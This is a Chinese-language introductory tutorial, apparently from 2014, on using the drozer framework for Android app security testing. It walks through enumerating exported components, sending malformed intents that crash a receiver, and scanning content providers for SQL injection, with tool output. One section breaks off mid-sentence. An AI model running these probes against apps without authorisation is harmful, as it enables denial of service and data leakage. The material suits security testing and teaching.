Android开源审计框架drozer -- APP安全测试入门
Xbalien
2014/7/31
一.利用drozer查看可以攻击的脆弱点(暴露组件):
1、查看Attack Surface:
run app.package.attacksurface
dz> run app.package.attacksurface com.package.name Attack Surface:
8 activities exported
2 broadcast receivers exported
2 content providers exported
0 services exported
2、获取app信息:
run app.package.info
dz> run app.package.info -a com.package.name Package: com.package.name
Application Label: app.name
Process Name: com.package.name
Version: 4.0
Data Directory: /data/data/com.package.name
APK Path: /data/app/com.package.name-1.apk UID: 10004
GID: [1015, 3003]
Shared Libraries: null
Shared User ID: null
Uses Permissions:
- android.permission.BAIDU_LOCATION_SERVICE
- android.permission.ACCESS_NETWORK_STATE
- android.permission.WRITE_EXTERNAL_STORAGE
- android.permission.INTERNET
- android.permission.INSTALL_PACKAGES
- android.permission.VIBRATE
- android.permission.READ_PHONE_STATE
- android.permission.KILL_BACKGROUND_PROCESSES - android.permission.ACCESS_WIFI_STATE
- android.permission.WRITE_SETTINGS
- android.permission.ACCESS_COARSE_LOCATION
- android.permission.ACCESS_FINE_LOCATION
- android.permission.SYSTEM_ALERT_WINDOW
- android.permission.SYSTEM_OVERLAY_WINDOW - android.permission.RECORD_AUDIO
二.intent组件触发(拒绝服务、权限提升)
xposed利用intent对组件的触发一般有两类漏洞,一类是拒绝服务,一类的权限提升。拒绝服务危害性比较低,更多的只是影响应用服务质量;而权限提升将使得没有该权限的应用可以通过intent触发享有该权限的应用,从而帮助其完成越权行为。
1.查看暴露的广播组件信息:
run app.broadcast.info
dz> run app.broadcast.info -a com.package.name -i
Package: com.package.name
Receiver: com.iver.AlarmReceiver
Intent Filter:
Actions:
- wisorg.intent.action.PUSH_MESSAGE
Intent Filter:
Actions:
- android.intent.action.DOWNLOAD_NOTIFICATION_CLICKED
- android.intent.action.DOWNLOAD_COMPLETE
Intent Filter:
Actions:
-
wisorg.intent.action.alarm
- wisorg.intent.action.BOOT
Permission: null
Receiver: com.iver.BootReceiver
Intent Filter:
Actions:
- android.intent.action.BOOT_COMPLETED
Permission: null
2.尝试拒绝服务攻击检测,向广播组件发送不完整intent(空action或空extras):run app.broadcast.send
ANR,Caused by: java.lang.NullPointerException,发现存在一处拒绝服务
3.尝试权限提升
权限提升其实和拒绝服务很类似,只不过目的变成构造更为完整、更能满足程序逻辑的intent。由于activity一般多于用户交互有关,所以基于intent的权限提升更多针对broadcast receiver和service。与drozer相关的权限提升工具,可
可以看出该app的provider都没有设置权限,如果设置权限只要不是signture 级别的,可以通过drozer agent build -p permission加入权限继续实现安全测试
2.可利用drozer查看存在可能存在SQLite注入的uri,存在注入即有存在被泄露和污染的可能
run scanner.provider.injection
dz> run scanner.provider.injection -a com.package.name
Scanning com.
Not Vulnerable:
content://acts/
content://com.package.name
content://com.package.name.downloads
content://acts
content://com.package.name.downloads/
content://com.package.name/
Injection in Projection:
content://telephony/carriers/preferapn/
content://com.package.name/favorites?notify=true/
content://com.package.name/favorites?notify=true
content://com.package.name/favorites?notify=false/
content://telephony/carriers/preferapn
content://com.package.name/favorites?notify=false
Injection in Selection:
content://telephony/carriers/preferapn/
content://com.package.name/favorites?notify=true/
content://com.package.name/favorites?notify=true
content://com.package.name/favorites?notify=false/
content://telephony/carriers/preferapn
content://com.package.name/favorites?notify=false
3.尝试简单的注入
run app.provider.query
发表评论